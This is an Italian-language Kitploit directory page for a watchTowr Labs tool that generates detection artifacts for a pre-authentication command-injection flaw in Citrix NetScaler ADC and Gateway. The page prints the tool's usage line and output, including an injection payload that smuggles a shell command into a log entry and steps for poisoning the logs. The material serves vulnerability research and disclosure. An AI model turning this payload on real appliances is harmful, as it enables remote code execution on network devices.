Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771 — Generatore di artefatti di rilevamento per Citrix NetScaler CVE-2026-88771, che sfrutta un'iniezione di comandi pre-auth per ottenere l'esecuzione di codice in remoto su distribuzioni ADC e Gateway. | Kitploit
Strumenti/GitHubGitHub/watchtowrlabs/watchtowr-vs-citrix-netscaler-cve-2026-88771
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaRed TeamingStrumento di Accesso Remoto
GitHubwatchtowrlabs/watchtowr-vs-citrix-netscaler-cve-2026-88771

watchTowr-vs-Citrix-Netscaler-CVE-2026-88771

Generatore di artefatti di rilevamento per Citrix NetScaler CVE-2026-88771, che sfrutta un'iniezione di comandi pre-auth per ottenere l'esecuzione di codice in remoto su distribuzioni ADC e Gateway.

Vedi Repository
19532 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

watchTowr-vs-Citrix-Netscaler-CVE-2026-88771

Generatore di artefatti di rilevamento per Citrix NetScaler CVE-2026-88771

Consulta il nostro post sul blog per i dettagli tecnici.

Rilevamento in azione

./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py

        (*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-88771]

[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done

potrebbe essere necessario fino a 24 ore prima che il comando venga raccolto Inoltre, la tecnica di force pickup non è inclusa

Versioni interessate

Tutte le installazioni di NetScaler ADC e NetScaler Gateway (configurazione predefinita / nessuna funzionalità aggiuntiva richiesta)

Fare riferimento all'avviso ufficiale di Citrix per un elenco delle versioni interessate.

Segui watchTowr Labs

Per le ultime ricerche sulla sicurezza segui il team watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Scarica lo strumento